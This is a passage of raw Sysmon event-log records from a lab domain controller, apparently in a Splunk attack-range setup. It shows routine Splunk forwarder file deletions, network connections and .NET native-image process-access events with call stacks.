:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:24.578{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30F0528BF66578B8AC1879FD2A376E68,SHA256=C3E96FFD1407346743050A4A32AD7F8A9B21E2BB32DED3EA746B35B1FC50CE5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:24.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F515992E57D5C66C0E9260D73F4C3EDA,SHA256=4874F4B0FA1E21BA0E4FE3248C111D3345748FA02238FFAC07DBABAC8E667058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:25.234{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34F8DC037402B5DC2E649770E1797BAA,SHA256=67C9CCA69ABCA0DA37D3B36BA9D5F9A9F1139AE3DEC9C7E206876CFC26E9EB4A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:25.307{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61438-false10.0.1.12-8000- 23542300x800000000000000021515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:26.265{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F6F8BABE0ED19A9C4AD380954E3E9B,SHA256=778963B0668B92CB41452859DE5DEB55EA2E78841A8B324646AAD55AC3AD5575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:26.140{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F307C063410ED71C76FD865FF89280A9,SHA256=05BDA195C59C489511D2F923F1734B02930840EC42A1E02DEE204089F42C0127,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:27.284{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E290BC47F8FA9CBD252D4D3962F534C7,SHA256=CEA604697B08ECB65EEC081E823146FEFA52B82B60074ED3EF6737FA68DA7823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:28.296{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AEF5CEE8F5F87AB340B6A29543D903E,SHA256=3A93ED5E75E58EC4FB61EB1BDD181F63DC48BD1FBC30C16CFEDDA171BD08029D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:29.312{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A2518805EE2700741A4A4B24F862064,SHA256=C0EC13D3AD7894D24735B803A262A14DF4A9E670FCA251ED6C5D210387153820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:30.357{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B15DBA139149F4DF8204EA16E52EA16,SHA256=77AC113F825A5AFB91DE6DFADAD0AD169FA4A90FBABF0B703A87410EF5C0C050,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:31.731{4DB9351A-A213-60D3-6C04-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\94c-0\System.Data.Entity.dll2021-06-23 21:05:31.731 23542300x800000000000000021521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:31.372{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27F4FB9519C3BCBA3A039A9651B35932,SHA256=C5CB7176B191C177B6042BD1728AFCBF6F9C524DEA4C0EA11F0E3640FB18831A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:31.130{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61439-false10.0.1.12-8000- 10341000x800000000000000021529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.404{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21C-60D3-6E04-00000000CF01}2364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.388{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33700B0080928A4B41C98B7F77510B18,SHA256=D5B141781B3E6643CB989819DA85D5D95BC7D0343D11C3BC6B4625CCC0BF90CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.388{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A21C-60D3-6E04-00000000CF01}2364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.388{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21C-60D3-6E04-00000000CF01}2364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.201{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.170{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.435{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F80D71C873B75FF5B86F14EA140E2668,SHA256=11F0EE4468E32D104217DD5089FEDE17452BFC053685B6210A5BBB7675FD9B7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.294{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.278{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.278{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F2F680E681594DB0D34EA67C49DEBFF,SHA256=776BF8EA469B29F7414E1D063B137402A192E725BA143DA274B8CAD91456746E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=099F10003B16DDF11F4E5182F42DF02D,SHA256=ED219A76F9E5BBE02EDCEE9B2F869F403ECD5360BE76A42C1DC4B464CCD128D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.154{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.154{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:33.060{4DB9351A-A21C-60D3-6E04-00000000CF01}2364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\93c-0\System.Data.Entity.Design.dll2021-06-23 21:05:33.060 10341000x800000000000000021549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.794{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.778{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.778{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 